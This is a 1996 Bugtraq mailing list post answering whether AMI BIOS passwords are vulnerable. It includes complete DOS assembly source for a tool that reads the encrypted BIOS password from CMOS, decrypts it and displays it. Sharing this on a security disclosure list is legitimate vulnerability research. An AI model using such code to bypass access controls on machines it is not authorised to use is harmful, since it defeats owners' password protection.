Bugtraq mailing list archives
Re: BoS: Magic password of some linux-box(Hardware..)
From: rmoar () apertos0 csc UVic CA (Roger Moar)
Date: Thu, 21 Nov 1996 08:36:25 -0800
Does anyone know if only the Award BIOS is susceptible to this? In other
words, are other BIOSes, such as AMI BIOS, susceptible to the same sort of
behavior?
Brian
I don't really remember where I got the following code, but it
worked a few years ago on a 486 machine. If AMI hasn't changed things
much, it may still work.
-Roger.
----------------------------------------------------------------------
; AMiPSW.ASM - Decodes and displays the Ami-Bios-Password!
; coded by mEsCaL/ThE SkeWerS
; v1.1 Toad Hall Tweak, 12 Mar 95
; - Minor optimizing (just can't resist)
; - Adding some comments
; David Kirschbaum, Toad Hall
CODE SEGMENT
ORG 100h
ASSUME CS:CODE,DS:CODE
Start PROC NEAR
; <-=-> THiS ONE READS THE ENCRYPTED PASSWORD FROM CMOS <-=->
mov cl,'[' ;Bracket the password v1.1
call CharOut ;display it v1.1
cld ;insure forward v1.1
mov cl,0b7h ;CMOS starting address
;v1.1 lea di,Password
mov di,offset Password ; v1.1
push di ;save for later v1.1
Read_Password:
mov al,cl ;CMOS address we want
out 70h,al
jmp $+2 ;delay a tick
in al,71h ;Get password char
;v1.1 mov [di],al ;stuff in buffer
;v1.1 inc di ;bump
stosb ;stuff in buffer v1.1
inc cl ;bump CMOS address
cmp cl,0b7h+7 ;done 7 chars yet?
jnz Read_Password ;not yet
; <-=-> NOW, WE HAVE TO DECRYPT CHAR BY CHAR <-=->
;v1.1 lea di,Password
pop di ;restore pointer to password v1.1
and byte ptr [di],0f0h ;mask first char
inc di ;point to next char
Decrypt_Next:
cmp di,Offset Password+7 ;hit end?
jnl Completed ;yep
cmp byte ptr [di],0 ;current char a 0?
jz Completed ;yep, 0 terminated
xor cl,cl ;handy 0
mov ch,byte ptr [di-1] ;get previous char
Decrypt:
inc cl ;build char in CL
mov ah,ch ;char to decrypt
xor dx,dx
test ah,10000000b
jz NotSet7
inc dh
NotSet7:
test ah,01000000b
jz NotSet6
inc dh
NotSet6:
test ah,00000010b
jz NotSet2
inc dh
NotSet2:
test ah,00000001b
jz NotSet1
inc dh
NotSet1:
add dl,2
cmp dl,dh
jl NotSet1 ;loop
sub dl,dh
shr ch,1
cmp dl,1
jnz $+5
add ch,80h
cmp ch,byte ptr [di] ;match next char?
jnz Decrypt ;nope, continue
; <-=-> AND FiNALLY, WE HAVE TO OUTPUT OUR DECRYPTED CHAR <-=->
mov ah,2 ;display char function
mov dl,cl ;this char
int 21h
inc di ;next char
jmp Decrypt_Next ;loop
; <-=-> THAT'S ALL? WELL, THAN LET'S QUiT DiZ SH**! :-) <-=->
Completed:
mov cl,']' ;Close the bracket v1.1
call CharOut ;display it v1.1
mov ax,4c00h ;terminate, ERRORLEVEL 0
int 21h
Start ENDP
;v1.1 New function: enter with char to display in CL
CharOut PROC NEAR ;v1.1
mov ah,2 ;display char function
mov dl,cl ;this char
int 21h
ret
CharOut ENDP
;Password DB 6 DUP (?)
Password label byte ;dynamic buffer v1.1
CODE ENDS
END Start
--
Roger Moar -- rmoar () csr uvic ca | http://apertos0.csc.uvic.ca/~rmoar
Current thread:
- Re: BoS: Magic password of some linux-box(Hardware..) Brian F. Knoll (Nov 20)
- Re: BoS: Magic password of some linux-box(Hardware..) Roger Moar (Nov 21)
- BoS: Magic password of some linux-box(Hardware..) (fwd) sameer (Nov 21)
- SGI Security Advisory 19961102 - FLEXlm and LicenseManager SGI Security Coordinator (Nov 21)
- SGI Security Advisory 19961103 - Sendmail Daemon Mode SGI Security Coordinator (Nov 21)
- CERT Advisory CA-96.24 - Sendmail Daemon Mode Vulnerability CERT Advisory (Nov 21)
- L0pht Kerberos Advisory sameer (Nov 22)
- <Possible follow-ups>
- Re: BoS: Magic password of some linux-box(Hardware..) Eugene Bradley (Nov 20)